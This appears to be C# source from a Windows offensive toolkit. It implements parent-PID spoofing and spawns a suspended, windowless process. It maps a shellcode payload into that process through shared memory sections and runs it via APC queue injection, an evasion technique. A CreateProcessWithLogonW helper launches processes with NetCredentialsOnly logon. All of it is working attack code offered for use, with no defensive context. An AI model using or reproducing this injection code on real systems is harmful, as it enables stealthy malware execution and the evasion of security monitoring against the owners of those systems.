public static bool CreateProcess(string processname, int ppid, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION procInfo) { Natives.STARTUPINFOEX sInfoEx = new Natives.STARTUPINFOEX(); sInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(sInfoEx); IntPtr lpValue = IntPtr.Zero; Natives.SECURITY_ATTRIBUTES pSec = new Natives.SECURITY_ATTRIBUTES(); Natives.SECURITY_ATTRIBUTES tSec = new Natives.SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); IntPtr pntpSec = Marshal.AllocHGlobal(Marshal.SizeOf(pSec)); Marshal.StructureToPtr(pSec, pntpSec, false); IntPtr pnttSec = Marshal.AllocHGlobal(Marshal.SizeOf(tSec)); Marshal.StructureToPtr(tSec, pnttSec, false); IntPtr lpSize = IntPtr.Zero; Natives.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); sInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); Natives.InitializeProcThreadAttributeList(sInfoEx.lpAttributeList, 1, 0, ref lpSize); IntPtr parentHandle = Process.GetProcessById(ppid).Handle; lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, parentHandle); Natives.UpdateProcThreadAttribute(sInfoEx.lpAttributeList, 0, (IntPtr)Natives.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); if (!Natives.CreateProcess(IntPtr.Zero, processname, pntpSec, pnttSec, false, (uint)cf, IntPtr.Zero, IntPtr.Zero, ref sInfoEx, out procInfo)) { return(false); } return(true); }
public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid) { Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION(); Natives.CreationFlags flags = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS | Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT; if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo)) { return(false); } //Round payload size to page size uint size = InjectionHelper.GetSectionSize(payload.Length); //Crteate section in current process IntPtr section = IntPtr.Zero; section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE); if (section == IntPtr.Zero) { return(false); } //Map section to current process IntPtr baseAddr = IntPtr.Zero; IntPtr viewSize = (IntPtr)size; InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_READWRITE); if (baseAddr == IntPtr.Zero) { return(false); } //Copy payload to current process section Marshal.Copy(payload, 0, baseAddr, payload.Length); //Map remote section IntPtr baseAddrEx = IntPtr.Zero; IntPtr viewSizeEx = (IntPtr)size; InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE); if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero) { return(false); } if (!InjectionHelper.UnMapViewOfSection(baseAddr)) { return(false); } // Assign address of shellcode to the target apc queue if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo)) { return(false); } InjectionHelper.ResumeThread(procInfo); Natives.CloseHandle(procInfo.hThread); Natives.CloseHandle(procInfo.hProcess); return(true); }
public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation) { Natives.STARTUPINFO startupInfo = new Natives.STARTUPINFO(); startupInfo.cb = (uint)Marshal.SizeOf(typeof(Natives.STARTUPINFO)); if (!Natives.CreateProcessWithLogonW(username, domain, password, Natives.LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation)) { return(false); } Console.WriteLine("Process created"); return(true); }
public static bool CreateProcessWithLogonW(string path, string binary, string arguments, Natives.CreationFlags cf, ref Natives.PROCESS_INFORMATION processInformation) { string domain; try { domain = Environment.UserDomainName; } catch (Exception) { domain = System.Environment.MachineName; } string username = Environment.UserName; return(CreateProcessWithLogonW(username, "password", domain, path, binary, arguments, cf, ref processInformation)); }